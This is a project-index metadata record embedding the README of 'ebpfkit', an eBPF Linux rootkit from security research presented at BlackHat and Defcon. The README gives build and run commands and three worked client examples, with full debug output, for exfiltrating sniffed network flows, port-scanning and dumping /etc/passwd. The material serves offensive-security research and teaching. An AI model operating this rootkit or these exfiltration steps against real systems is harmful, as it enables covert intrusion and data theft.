{"id":15003668,"url":"https://github.com/gui774ume/ebpfkit","last_synced_at":"2025-04-04T07:07:39.981Z","repository":{"id":37395418,"uuid":"351886433","full_name":"Gui774ume/ebpfkit","owner":"Gui774ume","description":"ebpfkit is a rootkit powered by eBPF","archived":false,"fork":false,"pushed_at":"2023-02-28T16:16:20.000Z","size":8001,"stargazers_count":782,"open_issues_count":4,"forks_count":92,"subscribers_count":18,"default_branch":"master","last_synced_at":"2025-03-27T13:41:24.602Z","etag":null,"topics":["ebpf","kernel","linux","linux-kernel","linux-kernel-hacking","rootkit","runtime-security","security"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Gui774ume.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2021-03-26T19:07:44.000Z","updated_at":"2025-03-24T12:30:50.000Z","dependencies_parsed_at":"2024-01-02T20:52:13.184Z","dependency_job_id":null,"html_url":"https://github.com/Gui774ume/ebpfkit","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Gui774ume%2Febpfkit","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Gui774ume%2Febpfkit/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Gui774ume%2Febpfkit/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Gui774ume%2Febpfkit/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Gui774ume","download_url":"https://codeload.github.com/Gui774ume/ebpfkit/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247135144,"owners_count":20889421,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ebpf","kernel","linux","linux-kernel","linux-kernel-hacking","rootkit","runtime-security","security"],"created_at":"2024-09-24T19:00:01.396Z","updated_at":"2025-04-04T07:07:39.961Z","avatar_url":"https://github.com/Gui774ume.png","language":"C","readme":"# ebpfkit\n\n[![License: GPL v2](https://img.shields.io/badge/License-GPL%20v2-blue.svg)](https://www.gnu.org/licenses/old-licenses/gpl-2.0.en.html)\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)\n\n`ebpfkit` is a rootkit that leverages multiple eBPF features to implement offensive security techniques. We implemented most of the features you would expect from a rootkit: obfuscation techniques, container breakouts, persistent access, command and control, pivoting, network scanning, Runtime Application Self-Protection (RASP) bypass, etc.\n\nThis rootkit was presented at [BlackHat USA 2021: With Friends Like eBPF, Who Needs Enemies?](https://www.blackhat.com/us-21/briefings/schedule/#with-friends-like-ebpf-who-needs-enemies-23619) and [Defcon 29: eBPF, I thought we were friends !](https://defcon.org/html/defcon-29/dc-29-speakers.html#fournier). While we presented our container breakouts at BlackHat, you'll want to check out our Defcon talk to see a demo of the network scanner and the RASP bypass. Slides and recordings of the talks will be available soon.\n\n## **Disclaimer**\nThis project is **not** an official Datadog product (experimental or otherwise), it is just code that happens to be developed by Datadog employees as part of an independent security research project. The rootkit herein is provided for educational purposes only and for those who are willing and curious to learn about ethical hacking, security and penetration testing with eBPF.\n\n**Do not attempt to use these tools to violate the law. The author is not responsible for any illegal action. Misuse of the provided information can result in criminal charges.**\n\n## System requirements\n\n- golang 1.13+\n- This project was developed on an Ubuntu Focal machine (Linux Kernel 5.4)\n- Kernel headers are expected to be installed in `lib/modules/$(uname -r)` (see `Makefile`)\n- clang \u0026 llvm (11.0.1)\n- [Graphviz](https://graphviz.org/) (to generate graphs)\n- [go-bindata](https://github.com/shuLhan/go-bindata) (`go get -u github.com/shuLhan/go-bindata/...`)\n\n## Build\n\n1) To build the entire project, run:\n\n```shell script\n# ~ make\n```\n\n2) To install `ebpfkit-client` (copies `ebpfkit-client` to `/usr/bin/`), run:\n```shell script\n# ~ make install_client\n```\n\n## Getting started\n\n`ebpfkit` contains the entire rootkit. It needs to run as root. Run `sudo ./bin/ebpfkit -h` to get help. You can simply run `sudo ./bin/ebpfkit` to start the rootkit with default parameters.\n\n```shell script\n# ~ sudo ./bin/ebpfkit -h\nUsage:\n ebpfkit [flags]\n\nFlags:\n --append (file override feature only) when set, the content of the source file will be appended to the content of the target file\n --comm string (file override feature only) comm of the process for which the file override should apply\n --disable-bpf-obfuscation when set, ebpfkit will not hide itself from the bpf syscall\n --disable-network-probes when set, ebpfkit will not try to load its network related probes\n --docker string path to the Docker daemon executable (default \"/usr/bin/dockerd\")\n -e, --egress string egress interface name (default \"enp0s3\")\n -h, --help help for ebpfkit\n -i, --ingress string ingress interface name (default \"enp0s3\")\n -l, --log-level string log level, options: panic, fatal, error, warn, info, debug or trace (default \"info\")\n --postgres string path to the Postgres daemon executable (default \"/usr/lib/postgresql/12/bin/postgres\")\n --src string (file override feature only) source file which content will be used to override the content of the target file\n --target string (file override feature only) target file to override\n -p, --target-http-server-port int Target HTTP server port used for Command and Control (default 8000)\n --webapp-rasp string path to the webapp on which the RASP is installed\n# ~ sudo ./bin/ebpfkit\n```\n\nIn order to use the client, you'll need to have an HTTP server to enable the Command and Control feature of the rootkit. We provide a simple webapp that you can start by running `./bin/webapp`. Run `./bin/webapp -h` to get help.\n\n```shell script\n# ~ ./bin/webapp -h\nUsage of ./bin/webapp:\n -ip string\n \tip on which to bind (default \"0.0.0.0\")\n -port int\n \tport to use for the HTTP server (default 8000)\n# ~ ./bin/webapp\n```\n\nOnce both `ebpfkit` and the `webapp` are running, you can start using `ebpfkit-client`. Run `ebpfkit-client -h` to get help.\n\n```shell script\n# ~ ebpfkit-client -h\nUsage:\n ebpfkit-client [command]\n\nAvailable Commands:\n docker Docker image override configuration\n fs_watch file system watches\n help Help about any command\n network_discovery network discovery configuration\n pipe_prog piped programs configuration\n postgres postgresql authentication control\n\nFlags:\n -h, --help help for ebpfkit-client\n -l, --log-level string log level, options: panic, fatal, error, warn, info, debug or trace (default \"info\")\n -t, --target string target application URL (default \"http://localhost:8000\")\n\nUse \"ebpfkit-client [command] --help\" for more information about a command.\n```\n\n## Examples\n\nThis section contains only 3 examples. We invite you to watch our BlackHat USA 2021 and Defcon 29 talks to see a demo of all the features of the rootkit. For example, you'll see how you can use Command and Control to change the passwords of a Postgresql database at runtime, or how we successfully hid the rootkit on the host.\nWe also demonstrate 2 container breakouts during our [BlackHat talk](https://www.blackhat.com/us-21/briefings/schedule/#with-friends-like-ebpf-who-needs-enemies-23619), and a RASP bypass during our [Defcon talk](https://defcon.org/html/defcon-29/dc-29-speakers.html#fournier).\n\n### Exfiltrate passive network sniffing data\n\nOn startup, by default, the rookit will start listening passively for all the network connections made to and from the infected host. You can periodically poll that data using the `network_discovery` command of `ebpfkit-client`. It may take a while to extract everything so be patient ...\n\n```shell script\n# ~ ebpfkit-client -l debug network_discovery get\nDEBUG[2021-08-04T10:10:46Z]\nGET /get_net_dis HTTP/1.1\nHost: localhost:8000\nUser-Agent: 0000________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________\n\nDEBUG[2021-08-04T10:10:46Z]\nGET /get_fswatch HTTP/1.1\nHost: localhost:8000\nUser-Agent: 0/ebpfkit/network_discovery#________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________\n\nDEBUG[2021-08-04T10:10:46Z]\nGET /get_net_dis HTTP/1.1\nHost: localhost:8000\nUser-Agent: 0015________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________\n\n[...]\n\nINFO[2021-08-04T10:10:57Z] Dumping collected network flows (358):\n10.0.2.2:52615 -\u003e 10.0.2.15:8000 (1) UDP 0B TCP 2461B\n10.0.2.15:8000 -\u003e 10.0.2.2:52615 (2) UDP 0B TCP 833B\n10.0.2.15:0 -\u003e 10.0.2.3:0 (3) UDP 0B TCP 0B\n10.0.2.3:0 -\u003e 10.0.2.15:0 (4) UDP 0B TCP 0B\n10.0.2.15:22 -\u003e 10.0.2.2:51653 (2) UDP 0B TCP 17120B\n10.0.2.2:51653 -\u003e 10.0.2.15:22 (1) UDP 0B TCP 13068B\n10.0.2.15:48308 -\u003e 3.233.147.212:443 (2) UDP 0B TCP 532255B\n\n[...]\n\n51.15.175.180:123 -\u003e 10.0.2.15:36389 (1) UDP 76B TCP 0B\n10.0.2.15:38116 -\u003e 169.254.172.1:51678 (2) UDP 0B TCP 60B\n10.0.2.15:38120 -\u003e 169.254.172.1:51678 (2) UDP 0B TCP 60B\n127.0.0.1:41900 -\u003e 127.0.0.1:8000 (2) UDP 0B TCP 53525B\n127.0.0.1:41900 -\u003e 127.0.0.1:8000 (1) UDP 0B TCP 53525B\n127.0.0.1:8000 -\u003e 127.0.0.1:41900 (2) UDP 0B TCP 38518B\n127.0.0.1:8000 -\u003e 127.0.0.1:41900 (1) UDP 0B TCP 38518B\nINFO[2021-08-04T10:10:58Z] Graph generated: /tmp/network-discovery-graph-453667534\n```\n\nThe final step is to generate the *svg* file. We used the `fdp` layout of [Graphviz](https://graphviz.org/).\n\n```shell script\n# ~ fdp -Tsvg /tmp/network-discovery-graph-453667534 \u003e ./graphs/passive_network_discovery.svg\n```\n\n![passive_network_discovery.svg](graphs/passive_network_discovery.svg)\n\n### Run a port scan on 10.0.2.3, from port 7990 to 8010\n\n\u003e Note: for this feature to work, you cannot run `ebpfkit-client` locally. If you're running the rootkit in a guest VM, expose the webapp port (default 8000) of the guest VM to the host and make the `ebpfkit-client` request from the host.\n\nTo request a port scan, use the `network_discovery` command. You can specify the target IP, start port and port range.\n\n```shell script\n# ~ ebpfkit-client -l debug network_discovery scan --ip 10.0.2.3 --port 7990 --range 20\nDEBUG[2021-08-04T11:59:46Z]\nGET /get_net_sca HTTP/1.1\nHost: localhost:8000\nUser-Agent: 0100000020030799000020______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________\n\nDEBUG[2021-08-04T11:59:51Z] {\"api\":{\"version\":\"1.0.1\",\"hash\":\"9b71d224bd62f3785d96d46ad3ea3d73319bfbc2890caadae2dff72519673ca72323c3d99ba5c11d7cfc1d215a922ad186ac28b0aaa23ed6ebe436e67aacd987cc6e14b8c5da0c4663475c2e5c3adef46f73bcdec043\",\"git_commit\":\"c1d215a922ad186acbe436e6e2c513128b0aaa23ed6e3a4d48140b4931895384bc5b8074b7ef6b1a3e2a65b5be0c875871fec6e1a38f9c3de2c51313a4d48140b4931895384bc5b8074b7ef6b35c208abd4e16f2\",\"release_date\":\"2021-03-29T13:51:31.606184183Z\"},\"timestamp\":\"2021-08-04T09:59:51.680566768Z\",\"status\":200,\"data\":\"OK\"}\n```\n\nOn the infected host, you should see debug logs in `/sys/kernel/debug/tracing/trace_pipe`. For example, you should see the initial ARP request to resolve the MAC address of the target IP, and then a list of SYN requests to probe the ports from the requested range.\n\n```shell script \n# ~ sudo cat /sys/kernel/debug/tracing/trace_pipe\n \u003cidle\u003e-0 [003] ..s. 5557.564353: 0: sending ARP request ...\n \u003cidle\u003e-0 [003] ..s. 5557.564451: 0: ARP response!\n sshd-3035 [003] ..s1 5559.108243: 0: SYN request answer (7990): rst:1 syn:0\n sshd-3035 [003] ..s. 5559.108482: 0: SYN request answer (7991): rst:1 syn:0\n \u003cidle\u003e-0 [003] ..s. 5559.108666: 0: SYN request answer (7992): rst:1 syn:0\n sshd-3035 [003] ..s. 5559.108882: 0: SYN request answer (7993): rst:1 syn:0\n sshd-3035 [003] ..s1 5559.109075: 0: SYN request answer (7994): rst:1 syn:0\n sshd-3035 [003] ..s1 5559.109304: 0: SYN request answer (7995): rst:1 syn:0\n \u003cidle\u003e-0 [003] .Ns. 5559.109568: 0: SYN request answer (7996): rst:1 syn:0\n \u003cidle\u003e-0 [003] ..s. 5559.109896: 0: SYN request answer (7997): rst:1 syn:0\n ksoftirqd/3-30 [003] ..s. 5559.110065: 0: SYN request answer (7998): rst:1 syn:0\n sshd-3035 [003] ..s. 5559.110344: 0: SYN request answer (7999): rst:1 syn:0\n \u003cidle\u003e-0 [003] ..s. 5559.110629: 0: OPEN PORT 8000\n \u003cidle\u003e-0 [003] ..s. 5559.110639: 0: SYN request answer (8000): rst:0 syn:1\n \u003cidle\u003e-0 [003] .Ns. 5559.110840: 0: SYN request answer (8001): rst:1 syn:0\n sshd-3035 [003] ..s. 5559.111100: 0: SYN request answer (8002): rst:1 syn:0\n sshd-3035 [003] ..s1 5559.111455: 0: SYN request answer (8003): rst:1 syn:0\n sshd-3035 [003] ..s1 5559.111661: 0: SYN request answer (8004): rst:1 syn:0\n \u003cidle\u003e-0 [003] .ns. 5559.111852: 0: SYN request answer (8005): rst:1 syn:0\n \u003cidle\u003e-0 [003] ..s. 5559.112016: 0: SYN request answer (8006): rst:1 syn:0\n \u003cidle\u003e-0 [003] ..s. 5559.112245: 0: SYN request answer (8007): rst:1 syn:0\n \u003cidle\u003e-0 [003] ..s. 5559.112597: 0: SYN request answer (8008): rst:1 syn:0\n \u003cidle\u003e-0 [003] ..s. 5559.112913: 0: SYN request answer (8009): rst:1 syn:0\n sshd-3035 [003] ..s. 5559.122702: 0: scan done !\n```\n\nOnce the scan is finished, you can exfiltrate the scan result using the `network_discovery` command. You need to add the `active` flag to request the network traffic generated by the network scan. It may take a while to extract everything so be patient ...\n\n```shell script\n# ~ ebpfkit-client -l debug network_discovery get --active\nDEBUG[2021-08-04T09:49:15Z]\nGET /get_net_dis HTTP/1.1\nHost: localhost:8000\nUser-Agent: 0000________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________\n\nDEBUG[2021-08-04T09:49:15Z]\nGET /get_fswatch HTTP/1.1\nHost: localhost:8000\nUser-Agent: 0/ebpfkit/network_discovery#________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________\n\nDEBUG[2021-08-04T09:49:15Z]\nGET /get_net_dis HTTP/1.1\nHost: localhost:8000\nUser-Agent: 0015________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________\n\n[...]\n\nINFO[2021-08-04T09:49:17Z] Dumping collected network flows (65):\n10.0.2.15:48308 -\u003e 3.233.147.212:443 (2) UDP 0B TCP 65811B\n3.233.147.212:443 -\u003e 10.0.2.15:48308 (1) UDP 0B TCP 17882B\n10.0.2.2:51653 -\u003e 10.0.2.15:22 (1) UDP 0B TCP 30320B\n10.0.2.15:22 -\u003e 10.0.2.2:51653 (2) UDP 0B TCP 39648B\n127.0.0.1:41684 -\u003e 127.0.0.1:8000 (2) UDP 0B TCP 4524B\n127.0.0.1:41684 -\u003e 127.0.0.1:8000 (1) UDP 0B TCP 4524B\n127.0.0.1:8000 -\u003e 127.0.0.1:41684 (2) UDP 0B TCP 3250B\n127.0.0.1:8000 -\u003e 127.0.0.1:41684 (1) UDP 0B TCP 3250B\n127.0.0.1:42682 -\u003e 127.0.0.53:53 (2) UDP 78B TCP 0B\n127.0.0.1:42682 -\u003e 127.0.0.53:53 (1) UDP 78B TCP 0B\n\n[...]\n\n10.0.2.15:57596 -\u003e 10.0.2.3:53 (2) UDP 145B TCP 0B\n10.0.2.3:53 -\u003e 10.0.2.15:57596 (1) UDP 145B TCP 0B\n127.0.0.1:53303 -\u003e 127.0.0.53:53 (2) UDP 78B TCP 0B\n127.0.0.1:53303 -\u003e 127.0.0.53:53 (1) UDP 78B TCP 0B\n10.0.2.15:34355 -\u003e 10.0.2.3:53 (2) UDP 145B TCP 0B\n10.0.2.3:53 -\u003e 10.0.2.15:34355 (1) UDP 145B TCP 0B\n127.0.0.53:53 -\u003e 127.0.0.1:53303 (2) UDP 78B TCP 0B\n127.0.0.53:53 -\u003e 127.0.0.1:53303 (1) UDP 78B TCP 0B\n127.0.0.1:41700 -\u003e 127.0.0.1:8000 (2) UDP 0B TCP 9368B\n127.0.0.1:41700 -\u003e 127.0.0.1:8000 (1) UDP 0B TCP 9368B\n127.0.0.1:8000 -\u003e 127.0.0.1:41700 (2) UDP 0B TCP 6338B\n127.0.0.1:8000 -\u003e 127.0.0.1:41700 (1) UDP 0B TCP 6338B\nINFO[2021-08-04T09:49:17Z] Graph generated: /tmp/network-discovery-graph-3064189396\n```\n\nThe final step is to generate the *svg* file. We used the `fdp` layout of [Graphviz](https://graphviz.org/).\n\n```shell script\n# ~ fdp -Tsvg /tmp/network-discovery-graph-3064189396 \u003e ./graphs/active_network_discovery.svg\n```\n\n![active_network_discovery.svg](graphs/active_network_discovery.svg)\n\n### Dump the content of /etc/passwd\n\nThis is a 3 steps process. First you need to ask the rootkit to start looking for `/etc/passwd`. You can use the `fs_watch` command of `ebpfkit-client` to do that.\n\n```shell script\n# ~ ebpfkit-client -l debug fs_watch add /etc/passwd\nDEBUG[2021-08-04T10:14:52Z]\nGET /add_fswatch HTTP/1.1\nHost: localhost:8000\nUser-Agent: 0/etc/passwd#_______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________\n\nDEBUG[2021-08-04T10:14:52Z]\n{\"api\":{\"version\":\"1.0.1\",\"hash\":\"9b71d224bd62f3785d96d46ad3ea3d73319bfbc2890caadae2dff72519673ca72323c3d99ba5c11d7cfc1d215a922ad186ac28b0aaa23ed6ebe436e67aacd987cc6e14b8c5da0c4663475c2e5c3adef46f73bcdec043\",\"git_commit\":\"c1d215a922ad186acbe436e6e2c513128b0aaa23ed6e3a4d48140b4931895384bc5b8074b7ef6b1a3e2a65b5be0c875871fec6e1a38f9c3de2c51313a4d48140b4931895384bc5b8074b7ef6b35c208abd4e16f2\",\"release_date\":\"2021-03-29T13:51:31.606184183Z\"},\"timestamp\":\"2021-08-04T10:14:52.777484554Z\",\"status\":200,\"data\":\"OK\"}\n```\n\nThen, you need to wait until a process on the infected host opens and reads `/etc/passwd` (run `sudo su` to simulate this step). The rootkit will copy the content of the file as it is sent back to the process by the kernel.\nFinally, you can exfiltrate the content of the file using the `fs_watch` command again.\n\n```shell script\n# ~ ebpfkit-client -l debug fs_watch get /etc/passwd\nDEBUG[2021-08-04T10:18:35Z]\nGET /get_fswatch HTTP/1.1\nHost: localhost:8000\nUser-Agent: 0/etc/passwd#_______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________\n\nINFO[2021-08-04T10:18:36Z] Dump of /etc/passwd:\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\nsystemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin\nsystemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin\nsystemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin\nmessagebus:x:103:106::/nonexistent:/usr/sbin/nologin\nsyslog:x:104:110::/home/syslog:/usr/sbin/nologin\n_apt:x:105:65534::/nonexistent:/usr/sbin/nologin\ntss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false\nuuidd:x:107:112::/run/uuidd:/usr/sbin/nologin\ntcpdump:x:108:113::/nonexistent:/usr/sbin/nologin\nsshd:x:109:65534::/run/sshd:/usr/sbin/nologin\nlandscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin\npollinate:x:111:1::/var/cache/pollinate:/bin/false\nvagrant:x:1000:1000:,,,:/home/vagrant:/usr/bin/zsh\nsystemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin\nubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash\nlxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false\npostgres:x:112:121:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash\n____________________________________________________________________________________________________________________________________\n```\n\n## License\n\n- The golang code is under Apache 2.0 License.\n- The eBPF programs are under the GPL v2 License.","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgui774ume%2Febpfkit","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fgui774ume%2Febpfkit","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgui774ume%2Febpfkit/lists"}